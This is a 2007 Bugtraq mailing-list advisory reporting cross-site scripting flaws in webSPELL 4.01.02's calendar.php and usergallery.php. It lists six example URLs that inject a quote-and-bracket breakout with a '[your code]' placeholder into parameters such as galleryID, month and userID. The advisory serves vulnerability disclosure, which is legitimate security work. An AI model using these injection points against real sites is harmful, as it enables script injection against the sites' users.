webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: webSPELL 4.01.02 (calendar.php, usergallery.php) XSS Vulnerability
From: brainheadbrainhead@xxxxxx
Date: 8 Dec 2007 22:53:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

###################
Autor: Brainhead                                                        
Type: XSS                                                   
Version:  4.01.02                               
Files: usergallery.php, calendar.php                        
Magic Quotes :off                                         
###################
Examples:

http://site.tld/[PATH]/index.php?site=usergallery&action=upload&galleryID=";>[your
 code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&upID=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&tag=";>[your code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&month=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&userID=";>[your 
code]
http://site.tld/[PATH]/index.php?site=calendar&action=announce&year=";>[your 
code]

Prev by Date: Lotfian.com DATABASE DRIVEN TRAVEL SITE Multiple SQL Injection
Next by Date: Call for Papers - Security and High Performance Computing System 2008
Previous by thread: Lotfian.com DATABASE DRIVEN TRAVEL SITE Multiple SQL Injection
Next by thread: Call for Papers - Security and High Performance Computing System 2008
Index(es):
- Date
- Thread